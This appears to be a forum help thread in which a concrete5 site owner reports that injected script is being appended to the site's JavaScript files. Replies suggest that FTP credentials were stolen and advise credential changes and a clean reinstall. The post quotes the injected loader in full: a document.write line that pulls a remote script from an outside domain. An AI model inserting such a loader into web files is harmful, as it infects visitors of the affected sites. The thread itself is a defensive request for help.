Malicious script infecting JS files in concrete directory
Permalink
I am experiencing a strange issue.
I malicious site infects various javascript files in the concrete/js directory - it appends the following script to the files (the numbers and links may vary):
What could be causing this?
I malicious site infects various javascript files in the concrete/js directory - it appends the following script to the files (the numbers and links may vary):
/*339497*/ /**/ document.write("<script type='text/javascript' src='http://starsapphire.ro/jfVx2D6Q.php'></"+ "script>"); /*/339497*/
What could be causing this?
Looks like they got your ftp details.
Maybe check your ftp log files!
Change your login credentials for ftp, ssh, concrete5
Check the concrete5 files dates.
Just download the C5 version your using and overwrite your installation.
Thehttp://starsapphire.ro site looks hacked to.
Just this part is still working:
http://starsapphire.ro/product_info.php/cPath/57/products_id/115?os...
Looks like a normal business website in jewelry.
.